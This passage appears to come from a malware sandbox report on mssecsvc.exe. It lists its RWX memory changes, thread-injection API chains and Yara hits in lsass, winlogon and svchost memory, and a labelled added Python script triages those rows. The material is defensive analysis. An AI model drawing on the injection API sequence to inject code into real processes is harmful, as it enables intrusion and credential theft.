                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeThread created: unknown EIP: 7FFF3C38
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                Source: winlogon.exe, 00000007.00000000.399164969.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.390729398.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.921088105.00000209004B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerG
                Source: dwm.exe, 00000012.00000000.458156548.000002456D75B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: winlogon.exe, 00000007.00000000.399164969.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.390729398.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.921088105.00000209004B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: winlogon.exe, 00000007.00000000.399164969.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.390729398.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.921088105.00000209004B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: winlogon.exe, 00000007.00000000.399164969.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.390729398.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.921088105.00000209004B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (3 rows)
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 rows)
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 rows)
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation (1 row)
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation (2 rows)
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0388E GetSystemTime,Sleep,InternetGetConnectedState,gethostbyname,socket,ioctlsocket,connect,Sleep,closesocket,4_2_00B0388E
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00B0042D
                Source: mssecsvc.exe, mssecsvc.exe, 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
                Source: mssecsvc.exeBinary or memory string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exe

                Stealing of Sensitive Information

                Source: Yara matchFile source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.902198033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.572101569.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.415723694.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.902191414.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.902360653.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.408695665.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422292285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.902190830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.487557526.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.902197478.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.424968557.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.902222817.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.581481544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.902164600.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.398152684.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.902195963.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.407147003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.407748268.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.415704475.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.902577911.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.902444306.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.902194677.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422258384.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.424980643.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.902193202.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000000.592851352.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.902192985.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.487502234.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.405766491.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.902365047.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000000.577790526.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.575671451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.599806801.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.902600386.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.404780139.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.902187383.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000029.00000002.902364285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000029.00000000.610017301.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.902363987.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.425355415.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.392885761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.399314141.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.405750585.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.416257871.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.902195308.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.902167065.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.902362977.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.398121607.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.902489489.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.389559026.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.595649330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.588589475.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422807100.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.902194107.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000000.532376607.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000002.902434304.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.902569116.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.902196541.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.425337469.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.400454619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422852544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000000.536806617.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.408708378.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.902362984.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000000.540275578.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.902194188.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.902542043.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000000.505888524.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.902453528.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000000.503757113.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.902195437.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.416244851.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.902186533.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000000.509831563.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.902365996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000000.487438968.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.404750620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.490758156.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.400467949.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.405270747.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.902605125.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.902526140.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.407730501.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000000.584556975.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000000.529226941.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.401684447.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 5092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 3296, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 796, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 840, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 952, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 312, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1108, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1272, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1340, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1480, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1728, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1780, type: MEMORYSTR
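                The rows in this part of the report carry three facts worth pulling out: mssecsvc.exe repeatedly switches pages at the same six bases to execute-read-write and then starts a thread at 7FFF3C38; the function at 4_2_00B0042D chains CreateToolhelp32Snapshot, Process32First/Next, OpenProcess and CreateRemoteThread (the enumerate, open, run sequence of thread injection, with NtMapViewOfSection in the same function as the delivery step); and the Yara hits under "Stealing of Sensitive Information" land in the memory of winlogon.exe, lsass.exe, dwm.exe, fontdrvhost.exe and many svchost.exe instances, mostly in dumps based at 7FFF0000. The script below is an added example, not part of the Joe Sandbox report, that folds rows of this shape into those facts so they do not have to be read off by hand. It assumes only the row format as it appears on this page (the HTML table cells are run together, so "mssecsvc.exeMemory protected" is the real shape of a row); the API groups used for tagging are this example's own heuristic, not anything the report defines, and the sample rows are a small constructed subset copied from this section.

```python
import re
from collections import Counter

# Constructed subset of rows copied from the report above. The cells of the
# original HTML table are run together, so "mssecsvc.exeMemory protected" is
# the shape a row actually has on the page.
SAMPLE_ROWS = r"""
Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and write
Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and write
Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and write
Source: C:\Windows\mssecsvc.exeThread created: unknown EIP: 7FFF3C38
Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0388E GetSystemTime,Sleep,InternetGetConnectedState,gethostbyname,socket,ioctlsocket,connect,Sleep,closesocket,4_2_00B0388E
Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00B0042D
Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 5092, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 564, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 716, type: MEMORYSTR
Source: Yara matchFile source: 00000007.00000002.902600386.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000000.422292285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
"""

MEMPROT = re.compile(r"^Source: (?P<src>.+?)Memory protected: unknown base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$")
THREAD = re.compile(r"^Source: (?P<src>.+?)Thread created: unknown EIP: (?P<eip>[0-9A-Fa-f]+)$")
CODEFN = re.compile(r"^Source: (?P<src>.+?)Code function: (?P<fn>\S+) (?P<apis>.+)$")
YARA_PID = re.compile(r"^Source: Yara matchFile source: Process Memory Space: (?P<proc>\S+) PID: (?P<pid>\d+), type: MEMORYSTR$")
# Dump ids read <process index>.<stage>.<serial>.<base address>.<flags>.sdmp
YARA_MEM = re.compile(r"^Source: Yara matchFile source: [0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})\.[0-9A-F.]+\.sdmp, type: MEMORY$")

# Heuristic API groups (this example's choice): opening a foreign process and
# starting code in it is the core of thread injection; enumeration and
# delivery calls in the same function only raise confidence.
OPEN_PROCESS = {"OpenProcess", "NtOpenProcess"}
RUN_REMOTE = {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread", "QueueUserAPC"}
ENUMERATE = {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}
DELIVER = {"WriteProcessMemory", "NtWriteVirtualMemory", "NtMapViewOfSection", "VirtualAllocEx"}
NETWORK = {"socket", "connect", "gethostbyname", "WSAConnect", "InternetOpenUrlA"}


def classify_apis(apis):
    """Tag one 'Code function' API list: 'injection', 'network', plus confidence tags."""
    s, tags = set(apis), set()
    if s & OPEN_PROCESS and s & RUN_REMOTE:
        tags.add("injection")
        tags |= {t for t, group in (("enumerates", ENUMERATE), ("delivers", DELIVER)) if s & group}
    if s & NETWORK:
        tags.add("network")
    return tags


def triage(report_text):
    """Fold behaviour rows into the few facts an analyst actually wants from them."""
    rwx_pages = Counter()      # (source process, page base) -> times set to RWX
    remote_threads = []        # (source process, thread start EIP)
    injection_fns, network_fns = [], []
    yara_processes = set()     # (image name, PID) whose memory matched a rule
    yara_bases = Counter()     # base address of each matched memory dump
    unparsed = 0               # rows no regex understood: the format-drift check
    for line in (row.strip() for row in report_text.splitlines() if row.strip()):
        if m := MEMPROT.match(line):
            prot = m["prot"].lower()
            if "execute" in prot and "write" in prot:
                rwx_pages[(m["src"], m["base"].upper())] += 1
        elif m := THREAD.match(line):
            remote_threads.append((m["src"], m["eip"].upper()))
        elif m := CODEFN.match(line):
            # The API list ends with the function id repeated; drop it.
            apis = [a for a in m["apis"].split(",") if a and a != m["fn"]]
            tags = classify_apis(apis)
            if "injection" in tags:
                injection_fns.append(m["fn"])
            if "network" in tags:
                network_fns.append(m["fn"])
        elif m := YARA_PID.match(line):
            yara_processes.add((m["proc"], int(m["pid"])))
        elif m := YARA_MEM.match(line):
            yara_bases[m["base"].lstrip("0") or "0"] += 1
        else:
            unparsed += 1
    return {
        "rwx_pages": rwx_pages,
        "remote_threads": remote_threads,
        "injection_functions": injection_fns,
        "network_functions": network_fns,
        "yara_processes": sorted(yara_processes),
        "yara_memory_bases": yara_bases,
        "unparsed": unparsed,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

                Run it as-is to summarise the sample rows, or feed it the whole behaviour section of the report to get the full counts. The "unparsed" counter is the check that matters when pointing it at a newer report: if it climbs, the row format has changed and the regexes need updating, rather than the script quietly producing an empty summary.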

                Remote Access Functionality

                Source: Yara matchFile source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.902198033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.572101569.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.415723694.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.902191414.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.902360653.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.408695665.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422292285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.902190830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.487557526.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.902197478.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.424968557.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.902222817.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.581481544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.902164600.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.398152684.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.902195963.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.407147003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.407748268.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.415704475.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.902577911.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.902444306.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.902194677.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422258384.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.424980643.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.902193202.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000000.592851352.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.902192985.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.487502234.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.405766491.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.902365047.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000000.577790526.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.575671451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
